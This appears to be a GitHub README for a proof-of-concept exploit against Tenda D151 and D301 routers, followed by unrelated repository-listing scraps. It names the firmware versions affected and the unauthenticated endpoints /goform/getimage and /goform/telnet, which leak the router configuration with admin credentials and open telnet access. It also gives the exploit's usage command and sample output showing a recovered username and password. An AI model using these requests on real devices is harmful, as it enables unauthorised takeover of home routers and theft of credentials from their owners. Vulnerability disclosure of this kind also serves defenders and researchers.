Tenda D151 D301 exploit (Proof of Concept)
Exploit Title: Tenda D151 & D301 - Unauthenticated configuration download (login included)
-
Exploit Author: BenChaliah
-
Vendor Homepage: https://www.tendacn.com
-
Software Link: https://www.tendacn.com/us/download/detail-3331.html
-
Versions:
- D301 1.2.11.2_EN
- D301 V2.0 50.22.1.8_EN
- D151 V2.0 50.21.1.5_EN
Description
This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage, you can also activate telnet service by requesting /goform/telnet (the service is already on by default, but this will execute an iptable command allowing access).
The configuration exists in the last part of the downloaded firmware image.
Usage (Python 2.7):
$ python exploit.py http://192.168.1.1
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -- By [email protected]@h
| D _]/\ \ -- github.com/BenChaliah
\___/ / /\ \
(_ )( _)
[!] Downloading config
username: admin
password: testpass
10 Dec 29, 2022
5 Aug 09, 2022
14 Nov 04, 2022
3 Nov 27, 2022
1 Dec 20, 2021
14 Feb 20, 2022
11 Nov 30, 2022
2 Jul 20, 2022
1 Oct 24, 2021
240 Jan 06, 2023
62 Dec 26, 2022
11 Dec 14, 2022
1 Jan 07, 2022
5.9k Dec 30, 2022
7 Dec 21, 2022
4 Jun 30, 2022
391 Jan 01, 2023
12 Oct 11, 2022
100 Dec 20, 2022
![Fw[a]rd](https://avatars.githubusercontent.com/u/18005538?v=4&s=60)
3 Jun 27, 2021